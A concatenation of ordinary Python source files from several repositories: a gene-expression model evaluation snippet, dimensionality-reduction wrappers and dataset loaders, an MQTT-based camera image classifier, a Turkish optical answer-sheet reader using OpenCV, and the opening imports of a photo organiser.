sequences[i] = 'N'+sequences[i]
A_onehot = np.array([1,0,0,0] , dtype=np.bool)
C_onehot = np.array([0,1,0,0] , dtype=np.bool)
G_onehot = np.array([0,0,1,0] , dtype=np.bool)
T_onehot = np.array([0,0,0,1] , dtype=np.bool)
N_onehot = np.array([0,0,0,0] , dtype=np.bool)
mapper = {'A':A_onehot,'C':C_onehot,'G':G_onehot,'T':T_onehot,'N':N_onehot}
worddim = len(mapper['A'])
seqdata = np.asarray(sequences)
seqdata_transformed = seq2feature(seqdata)
print(seqdata_transformed.shape)
expressions = [di[1] for di in d]
expdata = np.asarray(expressions)
expdata = expdata.astype('float')
return np.squeeze(seqdata_transformed),expdata
X,Y = read_hq_testdata(os.path.join('..','..','..','data','Glu','HQ_testdata.txt'))
Y = [float(x) for x in Y]
Y_pred= model.predict(X, batch_size = 1024)
Y_pred = [float(i[0]) for i in Y_pred]
pcc = scipy.stats.pearsonr(Y,Y_pred )[0]
print(pcc)
df = pd.DataFrame({'Y' : Y , 'Y_pred' : Y_pred , 'pcc' : pcc})
df.to_csv(ablated_layer+"_results.csv")
model.save(ablated_layer+"_model.h5")
##Clear Memory
tf.reset_default_graph()
tf.keras.backend.clear_session()
gc.collect()
##
``` |
{
"source": "1eg1on/dimreducers-crusher",
"score": 3
} |
#### File: dimreducers_crusher/crusher/reducers.py
```python
class BaseReducer:
def __init__(self, outdim=2, **kwargs):
pass
def fit(self, X):
pass
def transform(self, X):
pass
def fit_transform(
self, X,
):
self.fit(X)
return self.transform(X)
class UmapReducer(BaseReducer):
def __init__(self, outdim=2, **kwargs):
import umap
self.reducer = umap.UMAP(n_components=outdim, **kwargs)
def fit(self, X):
self.reducer.fit(X)
def transform(self, X):
return self.reducer.transform(X)
class TrimapReducer(BaseReducer):
def __init__(self, outdim=2, **kwargs):
import trimap
self.reducer = trimap.TRIMAP(n_dims=outdim)
def fit(self, X):
self.reducer.fit(X)
def transform(self, X):
return self.reducer.embedding_
class PyMDENeigh(BaseReducer):
def __init__(self, outdim=2, **kwargs):
self.outdim = outdim
self.kwargs = kwargs
def fit(self, X):
import pymde
self.reducer = pymde.preserve_neighbors(
X, embedding_dim=self.outdim, **self.kwargs
)
def transform(self, X):
return self.reducer.embed()
```
#### File: dimreducers_crusher/datasets/CovTypeDataset.py
```python
import sklearn
import numpy as np
from AbstractDataset import AbstractDataset
from sklearn.datasets import fetch_covtype
# shape: (581012, 54)
class CovTypeDataset(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, **kwargs) -> np.ndarray:
try:
print('Fetching CovType dataset...')
data = fetch_covtype(download_if_missing = True, shuffle = True)
X, y = data['data'], data['target']
return X, y
except:
raise RuntimeError
@property
def is_sparse(self) -> bool:
return False
```
#### File: dimreducers_crusher/datasets/FashionMNISTDataset.py
```python
from .AbstractDataset import AbstractDataset
from typing import Union
import numpy as np
import scipy.sparse as sps
import torchvision
import warnings
# Original datasource: https://github.com/zalandoresearch/fashion-mnist
# Shape: (60000, 784)
class FashionMNISTDataset(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, data_dir: str, **kwargs) -> Union[sps.spmatrix, np.ndarray]:
try:
train = torchvision.datasets.FashionMNIST(data_dir, download = True)
X = train.data.numpy().reshape(-1, 28 * 28)
return sps.csr_matrix(X)
except:
raise RuntimeError
@property
def is_sparse(self) -> bool:
return True
```
#### File: dimreducers_crusher/datasets/TwentyNewsgroups.py
```python
from .AbstractDataset import AbstractDataset
from typing import Union
import numpy as np
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
import scipy.sparse as sps
import warnings
# Original datasource: http://qwone.com/~jason/20Newsgroups/
# Pipeline as in https://scikit-learn.org/stable/auto_examples/model_selection/grid_search_text_feature_extraction.html#sphx-glr-auto-examples-model-selection-grid-search-text-feature-extraction-py
# Shape: (11314, 130107)
class TwentyNewsgroups(AbstractDataset):
def __init__(self):
super().__init__()
def get(self, random_state: int = 42, **kwargs) -> Union[sps.spmatrix, np.ndarray]:
try:
dataset = fetch_20newsgroups(subset = 'train', random_state = random_state)
cvec = CountVectorizer()
tfidfvec = TfidfTransformer()
data = cvec.fit_transform(dataset.data)
data = tfidfvec.fit_transform(data)
return data
except:
raise RuntimeError
@property
def is_sparse(self) -> bool:
return True
```
#### File: dimreducers_crusher/utils/distances.py
```python
import numpy as np
import scipy.sparse as sps
from typing import Union
def fast_euclidean(data: np.ndarray) -> np.ndarray:
dd = np.sum(data * data, axis=1)
dist = -2 * np.dot(data, data.T)
dist += dd + dd[:, np.newaxis]
np.fill_diagonal(dist, 0)
np.sqrt(dist, dist)
return dist
def distance_matrix(data: Union[np.ndarray, sps.spmatrix], metric: str = 'euclidean'):
if metric in ('euclidean', 'euc') and isinstance(data, np.ndarray):
return fast_euclidean(data)
raise NotImplementedError
``` |
{
"source": "1element/ip-camera-image-inference",
"score": 2
} |
#### File: 1element/ip-camera-image-inference/image-inference.py
```python
from __future__ import absolute_import
import yaml
import logging
import os
import datetime
import Queue
import numpy as np
import tensorflow as tf
import paho.mqtt.client as paho
NUM_PREDICTIONS = 2
config = None
labels = None
mqtt_client = None
image_queue = Queue.Queue()
def load_config():
"""Load config yaml file."""
global config
with open('config.yml', 'r') as file:
config = yaml.load(file)
def configure_logging():
"""Configure logging."""
numeric_level = getattr(logging, config['logging']['level'])
logging.basicConfig(level=numeric_level,
filename=config['logging']['filename'],
format='%(asctime)s %(levelname)s: %(message)s')
def create_graph():
"""Creates a tensorflow graph from saved GraphDef file."""
with tf.gfile.FastGFile(os.path.join(
config['inference']['model_dir'], 'output_graph.pb'), 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
def load_labels():
"""Read in labels, one label per line."""
filename = os.path.join(config['inference']['model_dir'], 'output_labels.txt')
global labels
labels = [line.rstrip() for line in tf.gfile.FastGFile(filename)]
def save_image(image):
"""Save image file if enabled in configuration."""
if config['save_images']['enabled']:
directory = config['save_images']['destination']
filename = datetime.datetime.now().strftime("%Y%m%d-%H%M%S%f") + '.jpg'
destination = os.path.join(directory, filename)
logging.debug('saving image to %s', destination)
f = open(destination, 'wb')
f.write(image)
f.close
def mqtt_connect():
"""Create MQTT client and connect to broker."""
global mqtt_client
logging.debug('connecting to mqtt broker %s', config['mqtt']['host'])
mqtt_client = paho.Client()
mqtt_client.tls_set()
mqtt_client.on_connect = mqtt_on_connect
mqtt_client.on_message = mqtt_on_message
mqtt_client.username_pw_set(config['mqtt']['username'], config['mqtt']['password'])
mqtt_client.connect(config['mqtt']['host'], config['mqtt']['port'])
mqtt_client.loop_start()
def mqtt_on_connect(client, userdata, flags, rc):
"""Callback on MQTT connection."""
logging.debug('successfully connected to mqtt broker')
client.subscribe(config['mqtt']['subscribe_topic'])
def mqtt_on_message(client, userdata, msg):
"""Callback on MQTT message."""
logging.debug('mqtt message received for topic %s', msg.topic)
image_queue.put(msg.payload)
def mqtt_publish(image):
"""Publish image to MQTT broker."""
logging.debug('publishing image to mqtt broker topic %s',
config['mqtt']['publish_topic'])
mqtt_client.publish(config['mqtt']['publish_topic'], image)
def serve_inference_requests():
"""Infinite loop serving inference requests."""
global image_queue
with tf.Session() as sess:
while True:
image_data = image_queue.get()
tensor = sess.graph.get_tensor_by_name('final_result:0')
predictions = sess.run(tensor, {'DecodeJpeg/contents:0': image_data})
predictions = np.squeeze(predictions)
top_k = predictions.argsort()[-NUM_PREDICTIONS:][::-1]
human_string = labels[top_k[0]]
score = predictions[top_k[0]]
logging.info('%s classified with score %.5f', human_string, score)
emit_image = False
if human_string != 'nothing':
emit_image = True
logging.debug('emitting image cause %s was detected', human_string)
elif score <= config['inference']['threshold']:
emit_image = True
logging.debug('emitting image cause score %.5f is below threshold of %s',
score, config['inference']['threshold'])
else:
logging.debug('image not emitted, cause nothing was detected with a probability of %.5f',
score)
if emit_image:
mqtt_publish(image_data)
else:
save_image(image_data)
def main(_):
# disable tensorflow compilation warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
create_graph()
load_labels()
serve_inference_requests()
if __name__ == '__main__':
load_config()
configure_logging()
mqtt_connect()
# run tensorflow main app
tf.app.run(main=main)
``` |
{
"source": "1enes/optical_form_reader",
"score": 2
} |
#### File: optical_form_reader/optical_form_reader/main.py
```python
import cv2
import numpy as np
from imutils import contours
from imutils.perspective import four_point_transform
import imutils
import cv2
import matplotlib.pyplot as plt
import numpy as np
from imutils import contours
from imutils.perspective import four_point_transform,order_points
import imutils
cevap_anahtar={0:2,1:1,2:2,3:3,4:1,5:4,6:4,7:3,8:1,9:1,10:0,11:0,12:2,13:1,14:2,15:3,16:4,17:4,18:4,19:3,20:2,21:1,22:0,23:0,24:0,25:4,26:2,27:3,28:4,29:4,30:4,31:3,32:2,33:1,34:0,35:0,36:1,37:2,38:3,39:4} #,
alfabe={0:'A',1:'B',2:'C',3:'Ç',4:'D',5:'E',6:'F',7:'G',8:'Ğ',9:'H',10:'I',11:'İ',12:'J',13:'K',14:'L',15:'M',16:'N',17:'O',18:'Ö',19:'P',20:'Q',21:'R',22:'S',23:'Ş',24:'T',25:'U',26:'Ü',27:'V',28:'W',29:'Y',30:'Z',31:'X'}
def cevap_islemleri(isim,coords):
a=0
thresh=cv2.threshold(isim,179,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),20)):
cevap=None
cnt=contours.sort_contours(coords[i:i+30])[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
a+=1
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
def cevap_contour_bul(isim,isim_gri):
coord=[]
thresholded=cv2.adaptiveThreshold(isim_gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
contour=cv2.findContours(thresholded,cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
x_coords=[(0,0)]
sayac=0
contour=imutils.grab_contours(contour)
contour=contours.sort_contours(contour,method="top-to-bottom")[0]
for c in contour:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if area<1500 and area>250 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
M=cv2.moments(box)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
res=tekrar_bul(x_coords,x)
if res is False and abs(x_coords[-1][1]-y)<35:
coord.append(approx)
x_coords.append((x,y))
sayac+=1
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
elif abs(x_coords[-1][1]-y)>=35:
coord.append(approx)
x_coords=[(0,0)]
sayac+=1
x_coords.append((x,y))
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
else:
continue
return coord
def ters_bul(kagit,areas):
ret=False
#print(areas[0][0])
if areas[0][0]!=1 and areas[0][1]+areas[1][1]>2300000:
kagit=imutils.rotate(kagit,angle=180)
print("Kağıdı ters koymuşsunuz,çevrildi")
ret=True
return ret,kagit
else:
return ret,kagit
def kagit_bul(image,gray):
thr=cv2.threshold(gray,150,255,cv2.THRESH_BINARY)[1]
contour=cv2.findContours(thr,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
contour=imutils.grab_contours(contour)
contour=sorted(contour,key=cv2.contourArea,reverse=True)
for c in contour:
approx=cv2.approxPolyDP(c,0.02*cv2.arcLength(c,True),True)
if len(approx)==4:
#cv2.drawContours(image,[approx],0,(0,255,0),thickness=3)
break
warp=four_point_transform(image,approx.reshape(4,2))
warp_gri=four_point_transform(gray,approx.reshape(4,2))
return warp,warp_gri
def soru_grup_contour_bul(resim,gri):
thr2=cv2.threshold(gri,0,255,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)[1]
can=cv2.Canny(thr2,50,100)
can=cv2.dilate(can,None,iterations=3)
coords=[]
cont=cv2.findContours(can,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
cont=imutils.grab_contours(cont)
for c in cont:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if cv2.contourArea(c)>30 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
if cv2.contourArea(box)>150:
coords.append(approx)
cv2.drawContours(resim,[box],0,(0,0,255),thickness=3)
if len(coords)==5:
return coords
else:
return 0
def tekrar_bul(array,koordinat):
for c in array:
if koordinat==c[0] or abs(koordinat-c[0])<15:
return True #Tekrar var
else:
pass
return False
def contour_bul(isim,isim_gri,karmasiklik=0):
coord=[]
thr6=cv2.adaptiveThreshold(isim_gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
#thr6=cv2.threshold(isim_gri,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)[1]
ar_value=200
#if karmasiklik==1:
# ar_value=800
cont=cv2.findContours(thr6,cv2.RETR_LIST,cv2.CHAIN_APPROX_NONE)
x_coords=[(0,0)]
sayac=0
cont=imutils.grab_contours(cont)
cont=contours.sort_contours(cont,method="top-to-bottom")[0]
for c in cont:
approx=cv2.approxPolyDP(c,0.0001*cv2.arcLength(c,True),True)
area=cv2.contourArea(approx)
(x, y, w, h) = cv2.boundingRect(approx)
ar = w / float(h)
if area<1300 and area>300 and ar>=0.9 and ar<=1.1:
box=cv2.minAreaRect(approx)
box=cv2.boxPoints(box)
box=np.array(box,dtype=np.int)
M=cv2.moments(box)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
# print(x,y)
res=tekrar_bul(x_coords,x)
if res is False and abs(x_coords[-1][1]-y)<35:
coord.append(approx)
x_coords.append((x,y))
sayac+=1
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
elif abs(x_coords[-1][1]-y)>=35:
coord.append(approx)
x_coords=[(0,0)]
sayac+=1
x_coords.append((x,y))
#cv2.drawContours(isim,[box],0,(255,0,0),thickness=3)
#cv2.drawContours(isim,[approx],0,(0,0,255),thickness=2)
else:
continue
return coord,thr6
def contour_cizdir(resim,cont,isim="default"):
for c in cont:
cv2.drawContours(resim,[c],0,(0,255,0),thickness=4)
#print(f"Bulunan contour sayısı: {len(cont)}")
def bolge_bul(resim,gri):
bolgeler={}
thr2=cv2.adaptiveThreshold(gri,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY_INV,9,8)
areas=[]
cont=cv2.findContours(thr2,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)
cont=imutils.grab_contours(cont)
temp=[]
cont=contours.sort_contours(cont,"top-to-bottom")[0]
a=0
for c in cont:
approx=cv2.approxPolyDP(c,0.009*cv2.arcLength(c,True),True)
if cv2.contourArea(approx)>10050 and len(approx)==4:
a+=1
M=cv2.moments(approx)
x=int(M['m10']/M['m00'])
y=int(M['m01']/M['m00'])
#areas.append([a,cv2.contourArea(approx)])
#cv2.putText(resim,"{}".format(a),(x,y),fontFace=cv2.FONT_HERSHEY_COMPLEX,fontScale=4,color=(255,0,0),thickness=3)
temp.append(approx.reshape(4,2))
areas.append([a,cv2.contourArea(approx)])
#cv2.drawContours(resim,[approx],0,(255,0,0),thickness=3)
#cv2.imshow("resim_olge",imutils.resize(resim,height=650))
if len(temp)>=5:
bolgeler={'isim':temp[0],'ogrno':temp[1],'sinav_turu':temp[2],'soru_grubu':temp[3],'ogretim_onay':temp[4],'cevaplar':temp[5]}
areas=sorted(areas,key=lambda x:x[1],reverse=True)
return bolgeler,areas
def cevap_islemleri(cevap,coords,col_no=1):
iki_cevap=0
bos=0
dogru=0
q_no=0
yanlıs=0
if col_no==1:
pass
elif col_no==2:
q_no=30
elif col_no==3:
q_no=60
elif col_no==4:
q_no=90
yanit=[]
#cevap=cv2.cvtColor(cevap,cv2.COLOR_BGR2GRAY)
thresh=cv2.threshold(cevap,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),5)):
cevap=None
cnt=contours.sort_contours(coords[i:i+5])[0]
toplam_beyaz=None
say=0
for (j,c) in enumerate(cnt):
if len(cevap_anahtar)<=q_no+s:
return (dogru,yanlıs,bos,iki_cevap)
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
#print(toplam_beyaz,j)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,q_no+s)
if toplam_beyaz>800:
say+=1
if say>1: #İKİ ŞIK İŞARETLEME DURUMU
iki_cevap+=1
continue
elif cevap[0]<800:# BOŞ BIRAKMA DURUMU
bos+=1
continue
else:
if cevap_anahtar[q_no+s]== cevap[1]:
#print(cevap_anahtar[q_no+s],cevap[1])
dogru+=1
else:
yanlıs+=1
'''
NUMBER OF TRUE,FALSE,NOT MARKED AND MARKED MORE THAN 1
'''
return(dogru,yanlıs,bos,iki_cevap)
def isim_islemleri(isim,coords,thresh):
a=0
yanit=[]
ad_str=""
coords=contours.sort_contours(coords,method="left-to-right")[0]
for (s,i) in enumerate(np.arange(0,len(coords),32)):
cevap=None
cnt=contours.sort_contours(coords[i:i+32],method="top-to-bottom")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
#plt.imshow(maske,cmap='gray')
#plt.show()
#a+=1
toplam_beyaz=cv2.countNonZero(maske)
#print(toplam_beyaz,j)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
# print("cevap",cevap)
if cevap[0]>500:
yanit.append(alfabe[cevap[1]])
elif cevap[0]<600:
yanit.append(" ")
for s in yanit:
ad_str+=s
return ad_str
def cevap_kolon(cevap):
pts1=np.array([(2,50),(300,50),(2,1545),(300,1545)])
pts2=np.array([(300,50),(600,50),(302,1545),(602,1545)])
pts3=np.array([(600,50),(900,50),(602,1545),(902,1545)])
pts4=np.array([(900,50),(1200,50),(902,1545),(1202,1545)])
col1=four_point_transform(cevap,pts1)
col2=four_point_transform(cevap,pts2)
col3=four_point_transform(cevap,pts3)
col4=four_point_transform(cevap,pts4)
return col1,col2,col3,col4
def cevap_gri(col1,col2,col3,col4):
'''
KOLONLARI GRİ YAPMAK İÇİN,MAİNDE YER KAPLAMASIN
'''
col1_gri=cv2.cvtColor(col1,cv2.COLOR_BGR2GRAY)
col2_gri=cv2.cvtColor(col2,cv2.COLOR_BGR2GRAY)
col3_gri=cv2.cvtColor(col3,cv2.COLOR_BGR2GRAY)
col4_gri=cv2.cvtColor(col4,cv2.COLOR_BGR2GRAY)
return col1_gri,col2_gri,col3_gri,col4_gri
def cevap_contour(col1,col2,col3,col4):
col1_gri,col2_gri,col3_gri,col4_gri=cevap_gri(col1,col2,col3,col4)
col1_coord=cevap_contour_bul(col1,col1_gri)
col2_coord=cevap_contour_bul(col2,col1_gri)
col3_coord=cevap_contour_bul(col3,col1_gri)
col4_coord=cevap_contour_bul(col4,col1_gri)
return col1_coord,col2_coord,col3_coord,col4_coord
def ogrno_islemleri(ogrno,ogrno_gri,coords):
yanit=""
thresh=cv2.threshold(ogrno_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="left-to-right")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="top-to-bottom")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
if cevap[0]>500:
yanit+=str(cevap[1])
print("Okul Numarası:",yanit)
def sinav_islemleri(sinav,sinav_gri,coords):
yanit=["QUİZ","ARA","FİNAL","BÜTÜNLEME"]
thresh=cv2.threshold(sinav_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="left-to-right")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
return yanit[cevap[1]]
def sorugrup_islemleri(soru,soru_gri,coords):
yanit=["A","B","C","D","E"]
sayac=0
thresh=cv2.threshold(soru_gri,180,255,cv2.THRESH_BINARY_INV)[1]
coords=contours.sort_contours(coords,method="top-to-bottom")[0]
for (s,i) in enumerate(np.arange(0,len(coords),10)):
cevap=None
cnt=contours.sort_contours(coords[i:i+10],method="left-to-right")[0]
toplam_beyaz=None
for (j,c) in enumerate(cnt):
maske=np.zeros(thresh.shape,dtype=np.uint8)
cv2.drawContours(maske,[c],0,(255,255,255),thickness=-1)
maske=cv2.bitwise_and(thresh,thresh,mask=maske)
plt.imshow(maske,cmap='gray')
#plt.show()
sayac+=1
toplam_beyaz=cv2.countNonZero(maske)
if cevap is None or toplam_beyaz>cevap[0]:
cevap=(toplam_beyaz,j,s)
if sayac==5:
break
print(cevap)
if cevap[0]>500:
return yanit[cevap[1]]
#print("tespit edilemedi")
return "Tespit edilemedi"
####################################################################
def main_starter(bos_kagit,dolu_kagit):
image=cv2.imread(bos_kagit)
gray=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
kagit,kagit_gri=kagit_bul(image,gray)
bolgeler,areas=bolge_bul(kagit,kagit_gri)
'''
FIND SCHOOL NUMBER PART
'''
ogrno_bos=four_point_transform(kagit,bolgeler['ogrno'])
ogrno_bos_gri=four_point_transform(kagit_gri,bolgeler['ogrno'])
ogrno_coord,ogrno_thresh=contour_bul(ogrno_bos,ogrno_bos_gri)
contour_cizdir(ogrno_bos_gri,ogrno_coord,"ogrenci numarası")
#v2.imshow("ogrno",imutils.resize(ogrno_bos,height=400))
'''
DIVIDE ANSWER PART INTO 4 SLICES AND FIND ONE BY ONE
'''
cevap_bos=four_point_transform(kagit,bolgeler['cevaplar'])
cevap_bos_gri=four_point_transform(kagit_gri,bolgeler['cevaplar'])
col1,col2,col3,col4=cevap_kolon(cevap_bos)
col1_gri,col2_gri,col3_gri,col4_gri=cevap_gri(col1,col2,col3,col4)
col1_coord,col2_coord,col3_coord,col4_coord=cevap_contour(col1,col2,col3,col4)
#contour_cizdir(col1,col1_coord)
#cevap_islemleri(col2_gri,coord_cevap)
'''
EXAM TYPE FIND PART
'''
sinav_bos=four_point_transform(kagit,bolgeler['sinav_turu'])
sinav_bos_gri=four_point_transform(kagit_gri,bolgeler['sinav_turu'])
sinav_coord,sinav_thresh=contour_bul(sinav_bos,sinav_bos_gri)
sinav_islemleri(sinav_bos,sinav_bos_gri,sinav_coord)
#cv2.imshow("sınav türü",sinav_bos_gri)
'''
OTHER PARTS THAT ON PAPER
'''
sorugrup_bos=four_point_transform(kagit,bolgeler['soru_grubu'])
sorugrup_bos_gri=four_point_transform(kagit_gri,bolgeler['soru_grubu'])
sorugrup_coord,sorugrup_thresh=contour_bul(sorugrup_bos,sorugrup_bos_gri,1)
coors=soru_grup_contour_bul(sorugrup_bos,sorugrup_bos_gri)
soru_cont,soru_thr=contour_bul(sorugrup_bos,sorugrup_bos_gri,1)
###############################
ogretim_bos=four_point_transform(kagit,bolgeler['ogretim_onay'])
ogretim_bos_gri=four_point_transform(kagit_gri,bolgeler['ogretim_onay'])
ogret_cont,ogret_thr=contour_bul(ogretim_bos,ogretim_bos_gri,1)
'''
NAME FIND PART.
'''
isim_bos=four_point_transform(kagit,bolgeler['isim'])
isim_bos_gri=cv2.cvtColor(isim_bos,cv2.COLOR_BGR2GRAY)
coord_isim, thres=contour_bul(isim_bos, isim_bos_gri)
#contour_cizdir(isim_bos,coord,"isim_bos")
#cevap_islemleri(cevap_bos_gri,coord)
##############################################
resim=cv2.imread(dolu_kagit)
resim_gri=cv2.cvtColor(resim,cv2.COLOR_BGR2GRAY)
warp2,warp2_gri=kagit_bul(resim,resim_gri)
bolgeler2,areas2=bolge_bul(warp2,warp2_gri)
ret,warp2=ters_bul(warp2,areas2)
'''
TERS İSE TEKRAR BOLGELERİ BUL
'''
if ret==True:
warp2_gri=cv2.cvtColor(warp2,cv2.COLOR_BGR2GRAY)
bolgeler2,areas2=bolge_bul(warp2,warp2_gri)
else:
pass
isim_dolu=four_point_transform(warp2,bolgeler2['isim'])
isim_dolu_gri=cv2.cvtColor(isim_dolu,cv2.COLOR_BGR2GRAY)
contour_cizdir(isim_dolu,coord_isim,"dolu_kagit_contourlu")
'''
OGRETİM ONAY DOLU KAGIT
'''
ogretim_dolu=four_point_transform(warp2,bolgeler2['ogretim_onay'])
ogretim_dolu_gri=cv2.cvtColor(ogretim_dolu,cv2.COLOR_BGR2GRAY)
ogret_onay=sorugrup_islemleri(ogretim_dolu,ogretim_dolu_gri,ogret_cont)
print("Öğretim Onayı:",ogret_onay)
#cv2.drawContours(ogretim_dolu,ogret_cont,-1,(255,0,0),thickness=3)
#cv2.imshow("ogretc",ogretim_dolu)
#ogretim_onayı=sorugrup_islemleri(ogretim_dolu,ogretim_dolu_gri,ogretimonay_coord)
sorugrup_dolu=four_point_transform(warp2,bolgeler2['soru_grubu'])
sorugrup_dolu_gri=cv2.cvtColor(sorugrup_dolu,cv2.COLOR_BGR2GRAY)
soru_tur=sorugrup_islemleri(sorugrup_dolu,sorugrup_dolu_gri,soru_cont)
print("Soru Grubu",soru_tur)
thresh_dolu=cv2.threshold(isim_dolu_gri,0,255,cv2.THRESH_BINARY_INV|cv2.THRESH_OTSU)[1]
isim_str=isim_islemleri(isim_dolu_gri,coord_isim,thresh_dolu)
print(isim_str)
sinav_dolu=four_point_transform(warp2,bolgeler2['sinav_turu'])
sinav_dolu_gri=cv2.cvtColor(sinav_dolu,cv2.COLOR_BGR2GRAY)
sinav_turu=sinav_islemleri(sinav_dolu,sinav_dolu_gri,sinav_coord)
print("Sınav Türü: ",sinav_turu)
ogrno_dolu=four_point_transform(warp2,bolgeler2['ogrno'])
ogrno_dolu_gri=cv2.cvtColor(ogrno_dolu,cv2.COLOR_BGR2GRAY)
ogrno_islemleri(ogrno_dolu,ogrno_dolu_gri,ogrno_coord)
cevap_dolu=four_point_transform(warp2,bolgeler2['cevaplar'])
cevap_dolu_gri=cv2.cvtColor(cevap_dolu,cv2.COLOR_BGR2GRAY)
col1_dolu,col2_dolu,col3_dolu,col4_dolu=cevap_kolon(cevap_dolu)
col1_gri_dolu,col2_gri_dolu,col3_gri_dolu,col4_gri_dolu=cevap_gri(col1_dolu,col2_dolu,col3_dolu,col4_dolu)
#contour_cizdir(col1_dolu,col1_coord,"colon1 dolu")
if len(cevap_anahtar)<=30:
basarim=cevap_islemleri(col1_gri_dolu,col1_coord,1)
elif len(cevap_anahtar)<=60:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim=(basarim1[0]+basarim2[0],basarim1[1]+basarim2[1],basarim1[2]+basarim2[2],basarim1[3]+basarim2[3])
#print(basarim)
elif len(cevap_anahtar)<=90:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim3=cevap_islemleri(col3_gri_dolu,col3_coord,3)
basarim=basarim1+basarim2+basarim3
elif len(cevap_anahtar)<=120:
basarim1=cevap_islemleri(col1_gri_dolu,col1_coord,1)
basarim2=cevap_islemleri(col2_gri_dolu,col2_coord,2)
basarim3=cevap_islemleri(col3_gri_dolu,col3_coord,3)
basarim4=cevap_islemleri(col4_gri_dolu,col4_coord,4)
basarim=basarim1+basarim2+basarim3+basarim4
print(f"Doğru cevap sayısı:{basarim[0]}\nYanlış cevap sayısı:{basarim[1]}\nBoş sayısı:{basarim[2]}\nİki cevap işaret:{basarim[3]}")
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == '__main__':
bos_kagit="optic_empty.jpg"
dolu_kagit="optic_marked.jpg"
main_starter(bos_kagit,dolu_kagit)
``` |
{
"source": "1enn0/phockup",
"score": 3
} |
#### File: phockup/src/phockup.py
```python
import hashlib
import os
import re
import shutil
import sys
from src.date import Date
from src.exif import Exif
